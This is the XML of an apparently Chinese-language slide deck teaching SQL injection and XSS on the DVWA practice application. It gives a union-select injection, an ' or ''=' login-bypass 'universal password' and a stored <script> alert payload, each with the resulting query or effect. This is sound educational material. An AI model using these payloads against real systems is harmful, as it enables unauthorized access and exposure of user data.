          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>拼接得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='' or ''='';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即打印所有用户的用户名和昵称</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB99C452-9A41-4507-B850-561DDABD3862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719540" y="1907507"/>
            <a:ext cx="8029803" cy="1063949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB808949-C9C5-4E22-AD25-DF1F2972A3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="24818" r="21853"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3696712" y="0"/>
            <a:ext cx="8084275" cy="7521236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372176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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2459504"/>
            <a:ext cx="12208812" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 输入恶意内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>union select user(),version()— +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>时</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>拼接得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=‘’ union select user(),version()— +';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>即打印</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据库的用户名和数据库版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362C1450-D9B4-4E43-90FA-349C7571832B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="25358" r="25917"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4086809" y="56094"/>
            <a:ext cx="6792686" cy="6745811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3447483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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2459504"/>
            <a:ext cx="12208812" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在密码框输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or ''='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>语句拼接得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='username' AND password='' or ''='';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>''=''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>始终成立，便不会判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password=''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这个错误的等式，因此通过该密码可以登录任意用户名的账户，称为万能密码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32225158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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2228790"/>
            <a:ext cx="12208812" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>超文本标记语言（英语：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Hyper Text Markup Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，简称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）是一种用于创建网页的标准标记语言。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一种基础技术，常与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>CSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一起被众多网站用于设计赏心悦目的网页、网页应用程序以及移动应用程序的用户界面。网页浏览器可以读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件，并将其渲染成可视化网页。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>描述了一个网站的结构语义随着线索的呈现，使之成为一种标记语言而非编程语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>元素是构建网站的基石。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>允许嵌入图像与对象，并且可以用于创建交互式表单，它被用来结构化信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例如标题、段落和列表等等，也可用来在一定程度上描述文档的外观和语义。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的语言形式为尖括号包围的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>元素（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>），浏览器使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>标签和脚本来诠释网页内容，但不会将它们显示在页面上。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34999398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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2228790"/>
            <a:ext cx="12208812" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，通常缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，是一种高级的，直譯語言的编程语言。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一门基于原型、函数先行的语言，是一门多范式的语言，它支持面向对象编程，命令式编程，以及函数式编程。 它提供语法来操控文本、数组、日期以及正则表达式等，不支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>I/O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，比如网络、存储和图形等，但这些都可以由它的宿主环境提供支持。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>攻击全称跨站脚本攻击，是为不和层叠样式表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(Cascading Style Sheets, CSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的缩写混淆，故将跨站脚本攻击缩写为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一种在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应用中的计算机安全漏洞，它允许恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户将代码植入到提供给其它用户使用的页面中。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40308032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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2228790"/>
            <a:ext cx="4382008" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DVWA-low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>正常提交的表单内容会显示在列表中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1799CA7B-064E-487F-AFF6-CD067E888D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="24288" r="25612"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4671526" y="5247"/>
            <a:ext cx="7184572" cy="6852753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23603556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XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2038AA9A-A7F8-4299-BF73-4C73F7250241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="2228790"/>
            <a:ext cx="4382008" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提交包含可执行脚本的内容，可执行脚本也会被保存在表格中，每当用户加载该页面同时也会加载到被添加的恶意可执行脚本并执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提交表单内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert("XSS")&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为一个弹窗的脚本代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>则刷新页面在加载列表的同时也会加载被注入的可执行代码，并显示弹窗。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
